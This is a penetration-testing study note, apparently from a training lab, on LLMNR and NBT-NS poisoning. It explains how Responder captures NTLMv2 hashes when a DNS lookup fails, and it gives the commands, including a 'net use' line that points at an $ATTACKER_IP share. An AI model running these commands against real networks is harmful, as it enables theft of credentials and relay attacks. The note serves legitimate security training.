### Definition - `Link-Local Multicast Name Resolution (LLMNR)` and `NetBIOS Name Service (NBT-NS)` are Microsoft Windows components that serve as alternate methods of host identification that can be used when DNS fails. - If a machine attempts to resolve a host but DNS resolution fails, typically, the machine will try to ask all other machines on the local network for the correct host address via LLMNR. - LLMNR is based upon the DNS format and allows hosts on the same local link to perform name resolution for other hosts. It uses port 5355 over UDP natively. - If LLMNR fails, the NBT-NS will be used. NBT-NS identifies systems on a local network by their NetBIOS name. NBT-NS utilizes port 137 over UDP. ### Example 1. A host attempts to connect to the print server at `\\\\print01.inlanefreight.local` but accidentally types in `\\\\printer01.inlanefreight.local` . 2. The DNS server responds, stating that this host is unknown. 3. The host then broadcasts out to the entire local network asking if anyone knows the location of `\\\\printer01.inlanefreight.local`. 4. The attacker (me with `Responder` running) responds to the host stating that it is the `\\\\printer01.inlanefreight.local` that the host is looking for. 5. The host believes this reply and sends an authentication request to the attacker with a username and NTLMv2 password hash. 6. This hash can then be cracked offline or used in an SMB Relay attack if the right conditions exist. ### Windows Target ```bash sudo responder -I $INTERFACE net use \\$ATTACKER_IP\Share ``` ### Linux Target